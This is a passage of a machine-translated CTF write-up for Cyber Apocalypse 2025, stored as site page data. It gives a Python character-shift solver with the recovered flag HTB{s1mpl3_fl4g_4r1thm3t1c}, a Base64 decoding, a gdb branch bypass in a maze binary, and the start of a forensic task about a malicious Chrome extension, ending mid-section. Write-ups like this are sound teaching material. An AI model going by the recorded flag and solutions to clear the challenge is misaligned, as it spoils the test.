{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-cyber-apocalypse-2025-en","result":{"data":{"markdownRemark":{"id":"c700b293-2284-5a08-b6aa-a514b54b6a95","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-cyber-apocalypse-2025\">original page</a>.</p>\n</blockquote>\n<p>I participated in Cyber Apocalypse CTF 2025 with 0nePadding.</p>\n<p>There were many interesting challenges, and I had a great time.</p>\n<p>I still have many challenges left to upsolve, but I will leave a brief writeup for now.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#encryptedscrollrev\">EncryptedScroll(Rev)</a></li>\n<li><a href=\"#sealedrunerev\">SealedRune(Rev)</a></li>\n<li><a href=\"#impossimazerev\">Impossimaze(Rev)</a></li>\n<li><a href=\"#stealth-invasionforensic\">Stealth Invasion(Forensic)</a></li>\n<li><a href=\"#toolpieforensic\">ToolPie(Forensic)</a></li>\n<li><a href=\"#blessingpwn\">Blessing(Pwn)</a></li>\n<li>\n<p><a href=\"#laconicpwn\">Laconic(Pwn)</a></p>\n<ul>\n<li><a href=\"#about-sigreturn-oriented-programmingsrop\">About Sigreturn Oriented Programming(SROP)</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"encryptedscrollrev\" style=\"position:relative;\"><a href=\"#encryptedscrollrev\" 
aria-label=\"encryptedscrollrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>EncryptedScroll(Rev)</h2>\n<blockquote>\n<p>Elowen Moonsong, an Elven mage of great wisdom, has discovered an ancient scroll rumored to contain the location of The Dragon’s Heart. However, the scroll is enchanted with an old magical cipher, preventing Elowen from reading it.</p>\n</blockquote>\n<p>Decompiling the challenge binary reveals the following function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 683px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3f1b3df3a02cda73b1b6974978c5ff7c/bca35/image-20250327195034529.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 63.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3f1b3df3a02cda73b1b6974978c5ff7c/8ac56/image-20250327195034529.webp 240w,\n/static/3f1b3df3a02cda73b1b6974978c5ff7c/d3be9/image-20250327195034529.webp 480w,\n/static/3f1b3df3a02cda73b1b6974978c5ff7c/e2d2f/image-20250327195034529.webp 683w\"\n              sizes=\"(max-width: 683px) 100vw, 683px\"\n           
   type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3f1b3df3a02cda73b1b6974978c5ff7c/8ff5a/image-20250327195034529.png 240w,\n/static/3f1b3df3a02cda73b1b6974978c5ff7c/e85cb/image-20250327195034529.png 480w,\n/static/3f1b3df3a02cda73b1b6974978c5ff7c/bca35/image-20250327195034529.png 683w\"\n            sizes=\"(max-width: 683px) 100vw, 683px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3f1b3df3a02cda73b1b6974978c5ff7c/bca35/image-20250327195034529.png\"\n            alt=\"image-20250327195034529\"\n            title=\"image-20250327195034529\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>By decrypting the hardcoded characters with the following solver, I was able to obtain the Flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">enc <span class=\"token operator\">=</span> <span class=\"token string\">r\"IUC|t2nqm4`gm5h`5s2uin4u2d~\"</span>\nflag <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>enc<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    flag <span class=\"token operator\">+=</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">ord</span><span class=\"token punctuation\">(</span>enc<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span 
class=\"token punctuation\">)</span> <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># HTB{s1mpl3_fl4g_4r1thm3t1c}</span></code></pre></div>\n<h2 id=\"sealedrunerev\" style=\"position:relative;\"><a href=\"#sealedrunerev\" aria-label=\"sealedrunerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>SealedRune(Rev)</h2>\n<blockquote>\n<p>Elowen has reached the Ruins of Eldrath, where she finds a sealed rune stone glowing with ancient power. 
The rune is inscribed with a secret incantation that must be spoken to unlock the next step in her journey to find The Dragon’s Heart.</p>\n</blockquote>\n<p>Decompiling the challenge binary reveals the following function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 712px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2c049d03d23a2bbd1e8b24815f3473c7/3d4b6/image-20250327195453428.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 67.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2c049d03d23a2bbd1e8b24815f3473c7/8ac56/image-20250327195453428.webp 240w,\n/static/2c049d03d23a2bbd1e8b24815f3473c7/d3be9/image-20250327195453428.webp 480w,\n/static/2c049d03d23a2bbd1e8b24815f3473c7/c4538/image-20250327195453428.webp 712w\"\n              sizes=\"(max-width: 712px) 100vw, 712px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2c049d03d23a2bbd1e8b24815f3473c7/8ff5a/image-20250327195453428.png 240w,\n/static/2c049d03d23a2bbd1e8b24815f3473c7/e85cb/image-20250327195453428.png 480w,\n/static/2c049d03d23a2bbd1e8b24815f3473c7/3d4b6/image-20250327195453428.png 712w\"\n            sizes=\"(max-width: 712px) 100vw, 712px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2c049d03d23a2bbd1e8b24815f3473c7/3d4b6/image-20250327195453428.png\"\n            alt=\"image-20250327195453428\"\n            title=\"image-20250327195453428\"\n            loading=\"lazy\"\n         
   style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>By Base64-decoding the hardcoded string and reversing it, I was able to obtain the Flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b834736fa5e2b30ff36b6ad41686a59e/18539/image-20250327195542278.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 32.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABD0lEQVQoz42QfW+CMBDG+/0/1/7com6+gEHLpkGkhQqUtkjxWencAjFZvOSXu2t6d88dYTmDMgqNbqDuaJcrrWBaAxpTxJ8UaZoiz3Mo5f42zQg5ycni+IpYbHGs9jiUO3yVEXZFCCoCxJcQEV9jm32AlxmqsvZFatRASun5jUl6SSAkR3OtoTqJXBV4oUts2MwxxzqbIeALiIbDdha2t+j7/gFrrYes0zkC9u7V0Dt7p46OKTdI+AHp6QztTjFee4gHjDEesjy/ISqWE3Zi5fzqz4dsAV5lblXtGmpfOG7Yti0Gu91uIIk4QGg2oRghNAeTJ3+SZ4xcagF1lTDWTe7UI+59uK3ptJPwo+I/vgECTRX+v52pYQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b834736fa5e2b30ff36b6ad41686a59e/8ac56/image-20250327195542278.webp 240w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/d3be9/image-20250327195542278.webp 480w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/e46b2/image-20250327195542278.webp 960w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/2b317/image-20250327195542278.webp 1074w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b834736fa5e2b30ff36b6ad41686a59e/8ff5a/image-20250327195542278.png 
240w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/e85cb/image-20250327195542278.png 480w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/d9199/image-20250327195542278.png 960w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/18539/image-20250327195542278.png 1074w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b834736fa5e2b30ff36b6ad41686a59e/d9199/image-20250327195542278.png\"\n            alt=\"image-20250327195542278\"\n            title=\"image-20250327195542278\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"impossimazerev\" style=\"position:relative;\"><a href=\"#impossimazerev\" aria-label=\"impossimazerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Impossimaze(Rev)</h2>\n<blockquote>\n<p>Elowen has been cursed to roam forever in an inescapable maze. 
You need to break her curse and set her free.</p>\n</blockquote>\n<p>Decompiling the challenge binary showed that it is a binary that performs window operations using ncurses.</p>\n<p>ncurses is a library with functionality like the following.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 890px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/93c38270513bd631c1c3ebd6e85875f9/4ef49/image-20250322085347091.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 13.750000000000002%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAtUlEQVQI1x2OwW6DMBAFLReJU1pUkzgGbJxiGzDQnNL+/5dNXQ6j1T7taJ/4tDWPTePCncEHdD/ipkTcnnzNeyHj48pHa05U23K9tlzeLwghkFJSVdVJXdf/mSTGRAgB5waMuTNND3Ke2baFeY4sS8J7R9+bcjeVPBNiIJf58/vCjY6u7+g6g5BvkrkIqYjOWWwhplj2xOhH1nXh+D5OeT/28milaRq01lg7cNO30lqhlDob/wE8Ck+7dzaw+AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/93c38270513bd631c1c3ebd6e85875f9/8ac56/image-20250322085347091.webp 240w,\n/static/93c38270513bd631c1c3ebd6e85875f9/d3be9/image-20250322085347091.webp 480w,\n/static/93c38270513bd631c1c3ebd6e85875f9/8d1ba/image-20250322085347091.webp 890w\"\n              sizes=\"(max-width: 890px) 100vw, 890px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/93c38270513bd631c1c3ebd6e85875f9/8ff5a/image-20250322085347091.png 240w,\n/static/93c38270513bd631c1c3ebd6e85875f9/e85cb/image-20250322085347091.png 480w,\n/static/93c38270513bd631c1c3ebd6e85875f9/4ef49/image-20250322085347091.png 890w\"\n            sizes=\"(max-width: 890px) 100vw, 890px\"\n      
      type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/93c38270513bd631c1c3ebd6e85875f9/4ef49/image-20250322085347091.png\"\n            alt=\"image-20250322085347091\"\n            title=\"image-20250322085347091\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 638px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/748abb1cac8e267925fb54b26789ab3d/41be6/image-20250322085520491.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 45.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRklEQVQoz41SW26DMBDkGv0IJErDIxAgxkCwsYGmSe5/ounuqomqqpX4GK1trefhdaDCNwyXHp+3O67XKx6PO+q6wmazQRRFL4RhKPi9577nervdIsiORxTFSVCWJyRpSoQ1Jj+hqioo1aBtWzSNwjAMUpVS6Lse6qykdxwdrDWI4xgBN91vNxhj4MYR8zRJUxInOBwOSEmAkWUpjiTOlxhZlsk+z3MUeYGc1vv9HgEfdl0nqg25macZXd9/k8av6GEY/Rn5JyTyO7nQjZZYTOwpqvNeYvAZqzLBbrdbhYCtW2OxLB8YLUVeZnjnYQYDz/HPtZCyOl941n8J2WFZlqhpABzTOXKmW3KnJfqF3pidryETQn5gTQSOXD2nxgLOjTJlnp61Vr7SmuhBnCTigN+rpbosC+Z5IhEN3Xaw5Jh/ApOvIfwCAuQONyqRuewAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/748abb1cac8e267925fb54b26789ab3d/8ac56/image-20250322085520491.webp 240w,\n/static/748abb1cac8e267925fb54b26789ab3d/d3be9/image-20250322085520491.webp 480w,\n/static/748abb1cac8e267925fb54b26789ab3d/a2d8a/image-20250322085520491.webp 638w\"\n              
sizes=\"(max-width: 638px) 100vw, 638px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/748abb1cac8e267925fb54b26789ab3d/8ff5a/image-20250322085520491.png 240w,\n/static/748abb1cac8e267925fb54b26789ab3d/e85cb/image-20250322085520491.png 480w,\n/static/748abb1cac8e267925fb54b26789ab3d/41be6/image-20250322085520491.png 638w\"\n            sizes=\"(max-width: 638px) 100vw, 638px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/748abb1cac8e267925fb54b26789ab3d/41be6/image-20250322085520491.png\"\n            alt=\"image-20250322085520491\"\n            title=\"image-20250322085520491\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Analyzing the challenge binary in more detail, I noticed a conditional branch that executes special processing only when the window’s x and y sizes have particular values.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/56f5d42406a03092636004ba307ff45e/280a1/image-20250322090459432.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 28.333333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/56f5d42406a03092636004ba307ff45e/8ac56/image-20250322090459432.webp 
240w,\n/static/56f5d42406a03092636004ba307ff45e/d3be9/image-20250322090459432.webp 480w,\n/static/56f5d42406a03092636004ba307ff45e/e46b2/image-20250322090459432.webp 960w,\n/static/56f5d42406a03092636004ba307ff45e/f992d/image-20250322090459432.webp 1440w,\n/static/56f5d42406a03092636004ba307ff45e/cfccf/image-20250322090459432.webp 1545w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/56f5d42406a03092636004ba307ff45e/8ff5a/image-20250322090459432.png 240w,\n/static/56f5d42406a03092636004ba307ff45e/e85cb/image-20250322090459432.png 480w,\n/static/56f5d42406a03092636004ba307ff45e/d9199/image-20250322090459432.png 960w,\n/static/56f5d42406a03092636004ba307ff45e/07a9c/image-20250322090459432.png 1440w,\n/static/56f5d42406a03092636004ba307ff45e/280a1/image-20250322090459432.png 1545w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/56f5d42406a03092636004ba307ff45e/d9199/image-20250322090459432.png\"\n            alt=\"image-20250322090459432\"\n            title=\"image-20250322090459432\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>When I used gdb to bypass this conditional branch and force the processing to run, I was able to obtain the Flag as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 436px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/bbdb15062c19277ac0cbf076ee3c7276/8574c/image-20250322090440613.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    
class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 66.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACVUlEQVQ4y1VTaZOaQBAdT1RUEBTvFfEA1FU3WnGj8diq7Pe4//+/vPRrY6XyYWqAafr1O8aMwhd0ux0MhgPYto1yuYyKXUGl8v8qV8oolSxZJa157CWUyv/euUyv10VHGhaLRdTrdTiOA2MMqlUb+XweLyMCdjEKR7heLxgMBtqEoM1mE7PZDIVCAbV6DbvdDma1WiIIAmSyGcTxHJ+fv3RiNmWh53no9/toNBq6r15X8H0faZpqE55blgXHdfDxceOEPURRpJRc15UJ+rqz4XK5QKvVgttwVY5sNqv01+u1AmQyGeRyOTRbTXQ6HVwuZxge1Go1LBapTsRGLOIUnPx4/CHUfAFx9CfqlM1lEYah0p1Op1p3Pv/E4fAdxm8+xm+322rMeByqXvw+n88EaKHaUhpSGommZEWabMp36vo00xBxKI222w32+72snRSNFPl2uwntpU7GNZ1OsNmsBWiu1GlKRaQ6nU7SY/hwmXrxkIh0k9MQLY5joXvUyeh8FI1VR0oUCgMmgDKRSZLEqjsBjOM8GtAlfrRlbLr8/n5Qbejs9XrF19ddXa3LehpJM6ivLRGjcXw2dI5OziUynu+JQVXJYFUF506jOB31ogwtafL2tlWzWM8aTpskiWbZjMdj5d/r9yQOr5pFUvO8xt9sxngmgZnjVGmaqDQEJ2Aq1GkO42T0JshtIRp/Zg4JEgQtFTmaROBtCtqB3p7NZqO0LbmGNJD69WUYgjIpxrKKmjsiUUNeq93uGybiKO8umyitQl614xl1Zbzo7v3+W2vIgJL8AZyoTKrnop68AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/bbdb15062c19277ac0cbf076ee3c7276/8ac56/image-20250322090440613.webp 240w,\n/static/bbdb15062c19277ac0cbf076ee3c7276/bfa8c/image-20250322090440613.webp 436w\"\n              sizes=\"(max-width: 436px) 100vw, 436px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/bbdb15062c19277ac0cbf076ee3c7276/8ff5a/image-20250322090440613.png 240w,\n/static/bbdb15062c19277ac0cbf076ee3c7276/8574c/image-20250322090440613.png 436w\"\n            sizes=\"(max-width: 436px) 100vw, 436px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/bbdb15062c19277ac0cbf076ee3c7276/8574c/image-20250322090440613.png\"\n            alt=\"image-20250322090440613\"\n            
title=\"image-20250322090440613\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"stealth-invasionforensic\" style=\"position:relative;\"><a href=\"#stealth-invasionforensic\" aria-label=\"stealth invasionforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stealth Invasion(Forensic)</h2>\n<blockquote>\n<p>Selene’s normally secure laptop recently fell victim to a covert attack. Unbeknownst to her, a malicious Chrome extension was stealthily installed, masquerading as a useful productivity tool. 
Alarmed by unusual network activity, Selene is now racing against time to trace the intrusion, remove the malicious software, and bolster her digital defenses before more damage is done.</p>\n</blockquote>\n<p>This challenge required analyzing the provided memory dump and identifying the following six Flags.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 549px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ad979de077fd10099ec8f071437715f6/928ea/image-20250323103645032.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 145%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAdCAYAAACqhkzFAAAACXBIWXMAAAsTAAALEwEAmpwYAAADpUlEQVRIx41V2VbiQBDNBzggsssiWxYIISxh3xFk1NHxzDx49GUe5v+/oaZudQKIivNwU51O59atpbs1o7kgs7WkevdGbLWzpozuUbrUosty+7+AtZlKh1LFJmnTzS96ev5Lm4dXxgvd//5Dtc6SElcNWfAV0oxE3iG9MaOCNSDNcGfkDrZkstJ6d02NvhpXnKnYcn1ChjsnRKKzBUr2WL5XmATvV0wEAekSKyzWRjJZxgJnJgAJ5pAC/AhCKAgQkGEeTuEApAhfC3KgsA8D4yA3XyHLOc9UPKUwZ3Q5Z2suxrUUxmqvxGu1fS2e4fArQogw3AW1xj9IAzvCQwggMg5QtEc7BaeANYXqUFKhJTmZ52mTLjJVCiV1OotX6BsjlNDpPGVKBQ8Rz9c/gEOxnC3QLi4tTmifq+SQ21vRaHFPg/kd9We35HgLJq4Iwkllz1PGp4iyKC3ChKjWJReg1lpQc3DD2FKjtyG7s5LeKnMuYUvcERGO5iQhJEfSBkFpNFPbI1ujWNamJCtPFVxCapKFhvz0EZAyCTmeqzG7zoTwgtDKMj6EcujbjMkE5t5i3l8Xy7LCEOdmsnokozGiZn/J+bsV4mPSjwDn2UqL09GjeK5KEKdFsxhYFGNvsKmCLQsVShROKIQSR2P+HknrojKWtfyxxYQcu96YSj8hR3mzx+MOoeFR/UJ1IChxTwbjoj3k7x6Hbe3yFw1yiCp7syfZo0ZzTu7wTnZMY3ArjSrEQjgWBwDI82ZfFc7vvygDBZYqx3J1mYQ6/IDFsNibwbeY/wMAZRAiREKqukII0T+z769U89ZCWOW9XHYmoljt6RVvTTW2/IMYWy1ok53CgBAPvCAH8BpGk6YVwtxOALammjcFQahvQt4p5AWT7Yt4xjno9LZy4kCx3d3IqWN7G5lLFV05SA+VvSPES9a/Q1AUHGUgAmGdyTEGoc3vVntJxdpwl79DlTtCbDlUFFWUY4h/QC5h8XPOH0uF/fbB909DRnIRJs4+HPlNbpvm6F7aBxboTB/5rvkucxijU
IdkbwiRk7NYicMwJcQgd+g/LECz42jbt446E48L86Yo482zJB1hoTVK9fHuQkIqEDpOdazB+3G474oCNWhiUcSVhCqlTFlUV+4WXd0fJwmRw0BdptKmvFh1j8ARCgAnqOxFsG9P9SEW4rZCeMhdd/4kiW9PHsR6s58yD2XHBJ8UxZHLCcRJPpkROsJLsZXQWR1CPizEqcb+By7/RenBUpplAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ad979de077fd10099ec8f071437715f6/8ac56/image-20250323103645032.webp 240w,\n/static/ad979de077fd10099ec8f071437715f6/d3be9/image-20250323103645032.webp 480w,\n/static/ad979de077fd10099ec8f071437715f6/42c6f/image-20250323103645032.webp 549w\"\n              sizes=\"(max-width: 549px) 100vw, 549px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ad979de077fd10099ec8f071437715f6/8ff5a/image-20250323103645032.png 240w,\n/static/ad979de077fd10099ec8f071437715f6/e85cb/image-20250323103645032.png 480w,\n/static/ad979de077fd10099ec8f071437715f6/928ea/image-20250323103645032.png 549w\"\n            sizes=\"(max-width: 549px) 100vw, 549px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ad979de077fd10099ec8f071437715f6/928ea/image-20250323103645032.png\"\n            alt=\"image-20250323103645032\"\n            title=\"image-20250323103645032\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          